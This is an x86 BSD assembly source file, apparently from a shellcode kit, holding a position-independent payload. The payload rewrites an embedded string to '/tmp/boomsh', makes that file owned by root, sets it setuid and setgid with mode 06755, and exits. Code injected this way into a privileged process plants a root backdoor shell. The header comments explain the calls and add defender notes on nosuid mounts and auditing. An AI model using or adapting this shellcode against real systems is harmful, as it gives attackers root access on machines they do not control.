path: root/other/shellkit/x86_bsd/FIXME_chmod.s
/* x86/BSD PIC local chmod code
 *
 * by stealth
 *
 * Position-independent i386 fragment (AT&T syntax) delimited by the
 * exported labels cbegin/cend.  It recovers the address of the string
 * embedded after `call foo`, rewrites that string in place to the path
 * "/tmp/boomsh", then issues three int $0x80 traps which the original
 * comments label chown, chmod and exit.
 *
 * Arguments are pushed on the stack, with one extra dword pushed last
 * before each trap.  This looks like the BSD i386 int $0x80 convention
 * (assumed from the x86_bsd directory name -- confirm for the kernel in
 * question).
 *
 * Defender view: if the calls succeed, the visible artefact is a file
 * in /tmp owned by uid 0 / gid 0 with the setuid and setgid bits set.
 * Mounting /tmp with nosuid neutralises that result, and auditing
 * chown/chmod calls that set mode bits 04000/02000 on files in
 * world-writable directories surfaces it.
 */

	.globl cbegin
	.globl cend

cbegin:
	jmp	boomsh		/* skip ahead so the call below can push the string address */

foo:	popl	%ebx		/* ebx = address of the embedded string (return address of `call foo`) */
	incl	(%ebx)		/* byte 0: '.' -> '/' */
	incl	4(%ebx)		/* byte 4: '.' -> '/' */
	
	xorl	%eax, %eax
	movb	%al, 11(%ebx)	/* byte 11: trailing '.' -> NUL, string is now "/tmp/boomsh" */
	
	movb	$16, %al	/* eax = 16, chown per the original comment */
	xorl	%ecx, %ecx
	pushl	%ecx		/* 0 */
	pushl	%ecx		/* 0 -- the two zero dwords are the owner/group arguments */
	pushl	%ebx		/* path */
	pushl	$1		/* extra top-of-stack dword, see header note */
sys_1:  int	$0x80
	
	xorl	%eax, %eax	/* chmod */
	movb	$15, %al	/* eax = 15 */
	pushw	$06755		/* mode 06755: setuid + setgid + rwxr-xr-x */
	pushl	%ebx		/* path */
	pushl	$1		/* extra top-of-stack dword, see header note */
sys_2:	int	$0x80
	
	xorl	%eax, %eax
	incl	%eax		/* eax = 1, exit per the original comment */
	pushl	$1
sys_3:	int	$0x80

/* The string is stored with '.' where the path has '/' and where the NUL
 * terminator goes; foo patches those three bytes at run time. */
boomsh: call foo
	.string ".tmp.boomsh.";
cend: